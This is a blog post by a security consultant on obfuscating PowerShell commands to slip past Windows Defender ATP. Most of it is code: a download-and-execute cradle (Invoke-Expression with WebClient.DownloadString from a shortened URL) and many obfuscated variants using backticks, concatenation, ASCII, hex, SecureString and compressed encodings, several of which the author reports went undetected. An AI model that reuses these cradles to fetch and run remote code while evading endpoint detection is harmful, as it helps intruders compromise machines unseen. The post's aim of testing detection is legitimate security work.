Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString(“https://bit.ly/sample”)

The command, simple retrieves the file from the URL specified and loads it into the current PowerShell session. WDATP. Easily recognizes the standard command, with ease and flags it. What about if we try a few different obfuscation approaches. See for the examples used below: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” + “bit.ly/sample”)

Invoke-Expression (New-Object Net.WebClient).DownloadString(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

 

Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object “`N`e`T`.`W`e`B`C`l`i`e`N`t”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://’ + ‘bit.ly/sample’)

 

Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}.”`I`N`V`o`k`e`C`o`m`m`A`N`d”). “`N`e`w`S`c`R`i`p`T`B`l`o`c`k“((& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)))

 

Interestingly, I did not see these get flagged and show up the console. However, when I ran it this way it did:

powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/sample’)”

Even using the “Invoke-Obfuscation” framework with something like the following three didn’t raise the alert.

ASCII Encoding
[StRiNg]::JoIn( ” , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv ‘*MDr*’).NamE[3,11,2]-joiN”)

HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+’x’)(( ( 49, ‘6e’ , 76, ‘6f’,’6b’, 65,’2d’,45 , 78, 70, 72,65 , 73, 73,69, ‘6f’ , ‘6e’ ,20,28,’4e’ ,65 , 77, ‘2d’, ‘4f’ ,62, ‘6a’, 65,63 ,74 , 20 , 53 , 79,73 ,74,65,’6d’,’2e’,’4e’ , 65 ,74 , ‘2e’ , 57,65, 62,43,’6c’ ,69, 65,’6e’, 74,29 ,’2e’, 44 , ‘6f’ , 77, ‘6e’,’6c’ , ‘6f’ ,61, 64, 53,74 , 72 ,69 , ‘6e’ , 67, 28, 27, 68 , 74,74, 70 , ‘3a’ , ‘2f’ , ‘2f’,62 , 69, 74 ,’2e’ , ‘6c’, 79,’2f’ ,73, 61 , ‘6d’ , 70 ,’6c’,65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin ”)

SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+’x’)(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($(‘76492d1116743f0423413b16050a5345MgB8AG0ARwBnAEEAUgBGAE8AMwB6AGsAbABPAEUAcgBNADEATgB5AHMAZAB2AGcAPQA9AHwAMwAxADgAZgBkADQAOABmADQAYQA2AGUAMgBjADkAOQA0AGYAZgAxADQAZQBhADcANwBkAGQAMwBmADgAZgAyAGUAMABkAGQAMAA1ADUANgA3AGMAYgA3AGUAOQBlADYAOQBmAGYAZABjADEANgBhADYAMwA0AGIANgA3ADQAYwBlAGQAMwAxAGUAZgAxADEANAA0ADIAMABkADgANgA0AGIAOABjAGUAOABkAGYAMgAyAGMAZAA1AGMAZgAzADYAOABmADAAYwA5AGQAYQA1ADAAYwA4AGQAMABiAGIANAA4ADcAYQAzADUAYwBlADAAZAA1AGYAYwAxAGQANQBjAGEAZgBiADYAYwAxADYAZQBlAGUAMgA0ADMANwA1AGYAOABhADkAZAA1AGQAZgBjADAAMAAyADQANwBiAGIAMABmADcAOQA4AGYAMQA0ADkAZAA3AGUAMwBmADgAMQBiADMAOAA5ADUANgAzADcAYQA0AGEAOQBhAGIANAA1ADgAZgBmAGYAMQAzADQAYgA0ADcAMAA4ADcAMQA0ADIAZQBkADIANwBjADQAMAAzAGQAMgA4AGQAZgAzAGQAZQBkADYAMABjADMAMQBlADkAMgBlAGMANABiAGQAZQBkADMAMAA5AGEAMwA0ADYAZABhADkAZQBlADcAZgBlADQAMQA3AGUAZQA0ADAAMgA4AGIAMgAzAGIAYwA5ADUANQA4AGQAMwA4AGIAYwAwADQAMQBiAGIAZABjADQAMABlADgAZAA4ADYAZgA1AGYAMwAwAGYANAAxADAAOAA4ADAAYQA2AGEAZQAxADgAZgA0ADkAZAA1ADYAMgA3AGIAZQA2ADAAZgAzADQANwAzAGYAYgAxAGUAZQBmADMAMAA3AGEANAA0ADYANwA5ADcAOQAwAGYAYwA5ADcANAAwADUAMQA5ADUAMQA3AGYAYwA5ADEAOAA5ADIAYgBjAGIANgAxADEANgA2ADEAZgBiADkANQA3ADcAZgAxADQAZQA4ADIA’| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing(‘RVRdb+JADPwreThdQVURgdBe++Y0Kxodm3SBVAqIhzbNBcrXKdCGov7483i3OvEA3rU9nhkvXsub1++7Y6zLTrybqjr9Oynrp1VRHjpbGh+WtFnc3bXm4yzhHNWJk6kap4+HcoycSUcj53m06AzVUZfbUNWTVnseLDoJbVWbWz6lv0vGGGeMsWWM5FiOGUPVH/E9Y2iqDw80YoyJKt5rNZnWq2Q43VebNKQRjTb7Itutiv2rank/Whc318Ft79X3/euboP+nG/T6gd9/8a+7g+7zoB8MdBX+IpVRVtGAhjklFD6TCqig8BPnLyb8oGFFMwp7pDSVJrwmZWjShJoeCno0dEsPDaUUblGfG+pTZEg3iBXlDZ0pirmeTjTMaGbCJUWEc84rSBN1UZcazo80zSrOi3LO43uuT4h6NNTcD/kxaUM++iToF60pqYBjKK/okyKF7wb1msI1cLhfH3ncf4X7WcXnnC/1jDtz9UkFHOnfR8zfJ9QnMl/s+og+a5mnwrkG3x5FGfMJ35x+K8zN+YGraySW8ww6cJ8KeGfpVzkdDGLghRvcp+AJ3WTuAvxPdm7EBN3Oljf0lPkHwOP7pcxPPA/6GZ5D9ESdRv4a/bXooGxf6Eisn9W5i3jm+qTCPwPPrtUL9wQeZ8Sc3zifTsBnXwPRobL1lnfuzuEv5sotP455PvGLz7918+3+IJ99bqAH85K9yTFPz+Kij8Jc//MjY/lxnewj9sA43Z1/rMNGzuE3dDDWt9xYHWbiS4H5GsSMswQv0YHxEmP1T2X/Kudv5vxbu7lj+BNgL2SPwNu4PRC/vt+Bhi490a9x/VAnuqF+jfOu3Bv2F/tiLP/UuL0BLxs38j5Ex9i+Q9v3DJzU7bHsLd6D8DHuXRr3XnL7Drhv4nxOoRf2wlg+7OvGzf8mvjg/L7wv736/+1Dj43F/dVD3WV0epnW8G3pX69LzWjeDTicI2m2PP23v66fHf0+HZbkZxdHcX1y6369zv7+4vDhdtP8B’), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+’x’-Join”)

To learn more about obfuscating PowerShell commands you can use the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

Now the good news is, if these were more malicious in nature than just downloading a file, then they would be flagged. For example using this method to download “Mimikatz” will trigger an alert.

Liam Cleary

Liam began his career as a Trainer of all things computer related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. Liam also serves as the Product Owner for Security at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks, within SharePoint and Office 365 customizations. His core focus will is to identify, control and protect whether they are full-fledged customizations or out-of-the-box Office 365 functionality. He is also a twelve-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, raspberry PI programming, hacking the planet or building Lego robots.

You may also like...